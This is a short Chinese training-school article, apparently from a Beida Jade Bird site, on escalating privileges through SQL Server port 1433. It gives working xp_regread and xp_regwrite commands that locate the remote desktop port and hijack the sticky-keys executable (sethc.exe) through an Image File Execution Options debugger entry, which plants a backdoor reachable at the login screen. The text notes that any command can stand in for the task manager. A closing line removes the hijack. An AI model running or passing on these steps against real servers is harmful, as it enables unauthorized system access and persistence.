北大青鸟数据库技术:1433映像劫持后门提权。
1.服务器开启了终端端口(终端端口未必是3389,可以自行查询)
2.服务器的粘滞键功能无损,只要可以正常弹出即可
3.服务器未禁止注册表编辑(即写入功能)
sql命令读取服务器终端端口:
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-
Tcp','PortNumber'
1.sql命令查询注册表粘滞键是否被劫持
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
了解更多北大青鸟数据库技术请继续关注云顶国际官网。
- MySQL数据库查询超时问题解决
- 北大青鸟数据库技术 1433映像劫持后门提权
- SQL是什么?SQL是什么意思?
- 7个使用比较广泛的HTML5视频音频播放器
- 关于mysql主从配置的一些总结知识
- 实现oracle数据库插入excel数据
- 数据库技术之简要分析SQL Server表的占用容量大小
- 云顶国际 为什么要学习云计算?
- mysql数据库存储IP地址省空间的方法
- mysql 无法联接的原因及处理方法
看过该数据库技术教程的还看过
本文标题:北大青鸟数据库技术 1433映像劫持后门提权,责任编辑:027hpedu,来源:北大青鸟武汉宏鹏鲁广校,于2013年04月23日15时11分发布于云顶国际登录官网。武汉云顶国际登录官网专注计算机电脑IT编程培训。学校专注java培训,ui设计培训,web前端培训,python培训,大数据培训等,北大青鸟学校累计为企业培养和输送IT专业人才85万。